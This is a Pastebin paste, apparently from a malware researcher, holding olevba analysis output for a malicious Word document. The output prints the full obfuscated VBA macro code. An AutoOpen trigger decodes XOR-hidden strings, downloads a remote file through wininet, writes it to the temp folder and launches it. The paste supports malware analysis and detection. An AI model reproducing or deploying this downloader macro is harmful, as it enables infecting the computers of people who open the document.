dynamoo

Malicious Word macro

Apr 20th, 2015
622
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- filename-1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: filename-1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: filename-1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub RAMIRO(FELIX As Long)
  17. CONRAD
  18. End Sub
  19.  
  20. Sub autoopen()
  21. RAMIRO (124)
  22. End Sub
  23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  24. ANALYSIS:
  25. +----------+----------+---------------------------------------+
  26. | Type     | Keyword  | Description                           |
  27. +----------+----------+---------------------------------------+
  28. | AutoExec | AutoOpen | Runs when the Word document is opened |
  29. +----------+----------+---------------------------------------+
  30. -------------------------------------------------------------------------------
  31. VBA MACRO PERCY.bas
  32. in file: filename-1.doc - OLE stream: u'Macros/VBA/PERCY'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34.  
  35. Public Function ORVILLE(ByRef OLIVER As Object, ByRef HOMER As Object) As Boolean
  36.  
  37. Dim DREW As Long
  38. Set OLIVER = IGNACIO(LAURENCE)
  39.  
  40. Dim JODY
  41.  
  42. Dim HUGO As String
  43. HUGO = LIONEL(2048, IRVING, RODERICK)
  44.  
  45. For DREW = 144 To 145
  46. DREW = DREW * 3
  47. Next DREW
  48. JODY = OLIVER & HUGO
  49.  
  50.  
  51. If WILFRED(HOMER, JODY) Then
  52.  
  53. End If
  54. If RANDOLPH(589, JODY) Then
  55. End If
  56. If WILFRED(HOMER, JODY) Then
  57. End If
  58.  
  59.  
  60. ORVILLE = RICARDO(OLIVER, HUGO, 9)
  61.  
  62. End Function
  63.  
  64. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  65. ANALYSIS:
  66. No suspicious keyword or IOC found.
  67. -------------------------------------------------------------------------------
  68. VBA MACRO CLAY.bas
  69. in file: filename-1.doc - OLE stream: u'Macros/VBA/CLAY'
  70. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  71. Public Function IGNACIO(ByRef NICHOLAS As Object) As Object
  72. Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
  73. End Function
  74. Sub CALEB(CALEIGH As Double)
  75.  
  76. CAMERON ("BRUCE")
  77. End Sub
  78.  
  79.  
  80.  
  81. Public Function SHELDON(ERICK As String, FRANKIE As String) As String
  82.    
  83.     Dim STEWART As Integer
  84.     Dim DOYLE As Integer
  85.    
  86.    
  87.     Dim DARREL As Integer
  88. For DARREL = 77 To 78
  89. If DARREL = 70 Then End
  90. Next DARREL
  91.    
  92.     Dim ROGELIO As Long
  93.     Dim TERENCE As String
  94.     For ROGELIO = 1 _
  95.     To _
  96.     ( _
  97.     SALVATORE _
  98.     (FRANKIE) _
  99.     / 2)
  100.         STEWART = PRESTON(FRANKIE, ROGELIO)
  101.         DOYLE = GILBERTO(ERICK, ROGELIO)
  102.         TERENCE = TERENCE + RUDOLPH(STEWART, DOYLE)
  103.     Next ROGELIO
  104.    SHELDON = TERENCE
  105. End Function
  106.  
  107. Public Function CAMERON(SANTIAGO As String)
  108. Dim ALONZO As Long
  109. ALONZO = 1
  110. ELIAS ALONZO * 2
  111. ALONZO = ALONZO + 4
  112. End Function
  113.  
  114.  
  115.  
  116.  
  117.  
  118.  
  119. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  120. ANALYSIS:
  121. No suspicious keyword or IOC found.
  122. -------------------------------------------------------------------------------
  123. VBA MACRO ROLANDO.bas
  124. in file: filename-1.doc - OLE stream: u'Macros/VBA/ROLANDO'
  125. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  126.  
  127.  
  128.  
  129. Public Function ELIAS(ERNESTO As Double)
  130.  
  131. Dim LIONEL As Object
  132.  
  133.  
  134.     Dim TAYLOR As Long
  135. For TAYLOR = 14 To 15
  136. TAYLOR = TAYLOR + 15
  137. Next TAYLOR
  138.    
  139.  
  140. Dim ELLIS  As Object
  141.  
  142.  
  143. For TAYLOR = 10 To 20
  144. TAYLOR = TAYLOR + 60
  145. Next TAYLOR
  146.    
  147.  
  148. Set ELLIS _
  149. = LAURENCE()
  150. ERNESTO = ERNESTO + 7
  151. For TAYLOR = 232 To 233
  152. TAYLOR = TAYLOR + 28
  153. Next TAYLOR
  154. Dim LEWIS As Boolean
  155.  
  156. LEWIS = ORVILLE(LIONEL, ELLIS)
  157. End Function
  158.  
  159.  
  160. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  161. ANALYSIS:
  162. No suspicious keyword or IOC found.
  163. -------------------------------------------------------------------------------
  164. VBA MACRO CORNELIUS.bas
  165. in file: filename-1.doc - OLE stream: u'Macros/VBA/CORNELIUS'
  166. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  167.  
  168. Option Explicit
  169.  
  170. Public Const HORACE = "163A372920620C3F23293A3724263B2A22"
  171. Public Const RODERICK = "19352024223875267D202B31"
  172. Public Const CARROLL = "2D2626357663622432233A38243A353723393D61302A3E7B70677D707962283736"
  173. Public Const ABRAHAM = "1631202C3C382421346B153D2937013C3F3828221C2739312626"
  174. Public Const IRVING = "TERRELLMOSES"
  175.  
  176. Private Const ROBIN = 4000
  177. Private Const CESAR As String = "NELSON"
  178. Private Const JOHCOLIN = 1
  179. Private Const MALCOLM = &H4000000
  180.  
  181. Public Function RUDOLPH(ByRef STEWART As Integer, ByRef DOYLE As Integer) As String
  182.     RUDOLPH = Chr(STEWART Xor DOYLE)
  183. End Function
  184.  
  185. Public Function PRESTON(ByRef FRANKIE As String, ByRef ROGELIO As Long) As Integer
  186.  PRESTON = Val("&H" & (WOODROW(32, FRANKIE, PETE(ROGELIO), 2)))
  187. End Function
  188. Public Function PETE(ByRef ROGELIO As Long) As Long
  189.  PETE = (2 * ROGELIO) - 1
  190. End Function
  191.  
  192. Public Function RANDOLPH(GEOFFREY As Long, ByVal JONATHON As String) As Boolean
  193.     #If VBA7 _
  194.     And Win64 Then
  195.         Dim GUILLERMO As LongPtr, NOEL As LongPtr
  196.     #Else
  197.         Dim GUILLERMO As Long, NOEL As Long
  198.     #End If
  199.     Dim DREWO As Long
  200.     Dim DOMINIC As String * ROBIN, SPENCER As String
  201.     Dim DELBERT As Integer, COLIN As Double
  202.     GUILLERMO = MARCOS
  203.     If GUILLERMO = 0 Then
  204.         Exit Function
  205.     End If
  206.     Dim LUCAS As Boolean
  207.    
  208.     If WILBERT(NOEL, GUILLERMO) Then
  209.     End If
  210.     If NOEL = 0 Then
  211.         COLIN = 0
  212.     Else
  213.         SYLVESTER NOEL, DOMINIC, ROBIN, DREWO
  214.         SPENCER = DOMINIC
  215.           Dim RODOLFO As Integer
  216. For RODOLFO = 321 To 322
  217. If RODOLFO > 1232 Then End
  218. Next RODOLFO
  219.         Do While DREWO <> 0
  220.             SYLVESTER NOEL, DOMINIC, ROBIN, DREWO
  221.                     SPENCER = SPENCER + Mid(DOMINIC, 1, DREWO)
  222.         Loop
  223.              COLIN = SALVATORE(SPENCER): _
  224.              DELBERT = LOWELL("JERRY")
  225.         Open JONATHON _
  226.             For Binary Access Write _
  227.         Lock Write _
  228.         As #DELBERT
  229.         Put #DELBERT, _
  230.                 , SPENCER
  231.         Dim EDMUND As Double
  232.             For EDMUND = 62 To 63
  233.     If EDMUND = 637 Then End
  234. Next EDMUND
  235.         Close #DELBERT
  236.     End If
  237.     WILSON NOEL
  238.     WILSON GUILLERMO
  239.     SPENCER = ""
  240.     If COLIN Then
  241.         RANDOLPH = True
  242.     End If
  243. End Function
  244.  
  245.  
  246.  
  247.  
  248. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  249. ANALYSIS:
  250. +------------+----------------+-----------------------------------------+
  251. | Type       | Keyword        | Description                             |
  252. +------------+----------------+-----------------------------------------+
  253. | Suspicious | Open           | May open a file                         |
  254. | Suspicious | Write          | May write to a file (if combined with   |
  255. |            |                | Open)                                   |
  256. | Suspicious | Put            | May write to a file (if combined with   |
  257. |            |                | Open)                                   |
  258. | Suspicious | Chr            | May attempt to obfuscate specific       |
  259. |            |                | strings                                 |
  260. | Suspicious | Xor            | May attempt to obfuscate specific       |
  261. |            |                | strings                                 |
  262. | Suspicious | Binary         | May read or write a binary file (if     |
  263. |            |                | combined with Open)                     |
  264. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  265. |            |                | be used to obfuscate strings (option    |
  266. |            |                | --decode to see all)                    |
  267. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  268. |            |                | may be used to obfuscate strings        |
  269. |            |                | (option --decode to see all)            |
  270. +------------+----------------+-----------------------------------------+
  271. -------------------------------------------------------------------------------
  272. VBA MACRO LAMAR.bas
  273. in file: filename-1.doc - OLE stream: u'Macros/VBA/LAMAR'
  274. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  275.  
  276.  
  277.  
  278.  
  279. Public Const SLIONEL = "JOHN"
  280.  
  281. #If VBA7 And Win64 Then
  282. Public _
  283. Declare _
  284. PtrSafe _
  285. Function _
  286. WILSON Lib _
  287. "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
  288. Public _
  289. Declare _
  290. PtrSafe _
  291. Function _
  292. GUSTAVO Lib _
  293. "wininet.dll" Alias "InternetOpenA" (ByVal SPENCER As String, ByVal JONATHONPH As Long, ByVal THOMAS As String, ByVal PRESTONTOPHER As String, ByVal DANIEL As Long) As LongPtr
  294. Public _
  295. Declare _
  296. PtrSafe _
  297. Function _
  298. SYLVESTER Lib _
  299. "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal DOMINIC As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  300. Public _
  301. Declare _
  302. PtrSafe _
  303. Function _
  304. ROOSEVELT Lib _
  305. "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
  306. #Else
  307. Public Declare Function WILSON Lib "wininet.dll" _
  308. Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
  309. Public Declare Function GUSTAVO Lib "wininet.dll" _
  310. Alias "InternetOpenA" (ByVal SPENCER As String, ByVal JONATHONPH As Long, ByVal THOMAS As String, ByVal PRESTONTOPHER As String, ByVal DANIEL As Long) As Long
  311. Public Declare Function SYLVESTER Lib "wininet.dll" _
  312. Alias "InternetReadFile" (ByVal PAUL As Long, ByVal DOMINIC As String, ByVal DONALD As Long, GEORGE As Long) As Integer
  313. Public Declare Function ROOSEVELT Lib "wininet.dll" _
  314. Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
  315. #End If
  316.  
  317.  
  318. Public Function WOODROW(SAMMY As Long, ByRef KRISTOPHER As String, ByRef STEWART As Integer, ByRef DOYLE As Integer) As String
  319.     WOODROW = Mid$(KRISTOPHER, STEWART, DOYLE)
  320.     SAMMY = SAMMY + 50
  321. End Function
  322. #If VBA7 _
  323.     And Win64 Then
  324. Public Function MARCOS() As LongPtr
  325.  #Else
  326. Public Function MARCOS() As Long
  327.  
  328.  #End If
  329.  
  330.  MARCOS = GUSTAVO(CESAR, JOHCOLIN, vbNullString, vbNullString, 0)
  331. End Function
  332.  
  333. Public Function LIONEL(FREDDIE As Long, TERRENCE As String, ENRIQUE As String) As String
  334. FREDDIE = FREDDIE * 2
  335. LIONEL = SHELDON(TERRENCE, ENRIQUE)
  336.    
  337. End Function
  338.  
  339.  
  340.  
  341.  
  342.  
  343.  
  344. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  345. ANALYSIS:
  346. +------------+----------------+-----------------------------------------+
  347. | Type       | Keyword        | Description                             |
  348. +------------+----------------+-----------------------------------------+
  349. | Suspicious | Lib            | May run code from a DLL                 |
  350. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  351. |            |                | may be used to obfuscate strings        |
  352. |            |                | (option --decode to see all)            |
  353. | IOC        | wininet.dll    | Executable file name                    |
  354. +------------+----------------+-----------------------------------------+
  355. -------------------------------------------------------------------------------
  356. VBA MACRO DEXTER.bas
  357. in file: filename-1.doc - OLE stream: u'Macros/VBA/DEXTER'
  358. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  359.  
  360. Public Function WILFRED(ByRef JERMAINE As Object, ByVal FORREST As String) As Boolean
  361. If JERMAINE.FileExists(FORREST) Then
  362. WILFRED = True
  363. Else
  364. WILFRED = False
  365. End If
  366. End Function
  367.  
  368.  
  369. Public Function GILBERTO(ByRef ERICK As String, ByRef ROGELIO As Long) As Integer
  370. GILBERTO = Asc(WOODROW(44, ERICK, _
  371.         ((ROGELIO Mod SALVATORE(ERICK)) + 1), 1))
  372. End Function
  373. Public Function LAURENCE() As Object
  374. Dim ISMAEL As String
  375. ISMAEL = SHELDON(IRVING, ABRAHAM)
  376. Set LAURENCE = CreateObject(ISMAEL)
  377. End Function
  378. #If VBA7 And Win64 Then
  379.        Public Function WILBERT(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
  380.     #Else
  381.        Public Function WILBERT(ByRef GRADY As Long, NOAH As Long) As Boolean
  382.     #End If
  383.         Dim PHIL As Double
  384. Dim GUADALUPE As String
  385. Dim CLARK As Long
  386.     GUADALUPE = LIONEL(893, IRVING, CARROLL)
  387.  
  388. For PHIL = 14 To 15
  389. PHIL = PHIL + 5.5
  390. Next PHIL
  391.     GRADY = ROOSEVELT(NOAH, GUADALUPE, vbNullString, 0, MALCOLM, 0)
  392.     WILBERT = True
  393. End Function
  394.  
  395.  
  396. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  397. ANALYSIS:
  398. +------------+--------------+--------------------------+
  399. | Type       | Keyword      | Description              |
  400. +------------+--------------+--------------------------+
  401. | Suspicious | CreateObject | May create an OLE object |
  402. +------------+--------------+--------------------------+
  403. -------------------------------------------------------------------------------
  404. VBA MACRO AMOS.bas
  405. in file: filename-1.doc - OLE stream: u'Macros/VBA/AMOS'
  406. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  407.  
  408. Public Sub CONRAD()
  409.         Dim BERT As Long
  410.  
  411.     Dim ELBERT As Long
  412. For ELBERT = 5 To 11
  413. ELBERT = ELBERT * 3
  414. Next ELBERT
  415.  
  416. CALEB (8.2)
  417.  
  418. End Sub
  419. Public Function RICARDO(ByRef OLIVER As Object, ByRef HUGO As String, RUBEN As Double) As Boolean
  420.  
  421. Set TOMAS = CreateObject _
  422. (SHELDON _
  423. (IRVING, HORACE))
  424. Dim BRETT As Integer
  425. BRETT = TOMAS.Open(OLIVER & HUGO)
  426. End Function
  427.  
  428. Public Function SALVATORE(KRISTOPHER As String) As Long
  429. SALVATORE = Len(KRISTOPHER)
  430. End Function
  431. Public Function LOWELL(KRISTOPHER As String) As Integer
  432.     LOWELL = FreeFile
  433. End Function
  434.  
  435.  
  436. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  437. ANALYSIS:
  438. +------------+--------------+--------------------------+
  439. | Type       | Keyword      | Description              |
  440. +------------+--------------+--------------------------+
  441. | Suspicious | CreateObject | May create an OLE object |
  442. | Suspicious | Open         | May open a file          |
  443. +------------+--------------+--------------------------+
RAW Paste Data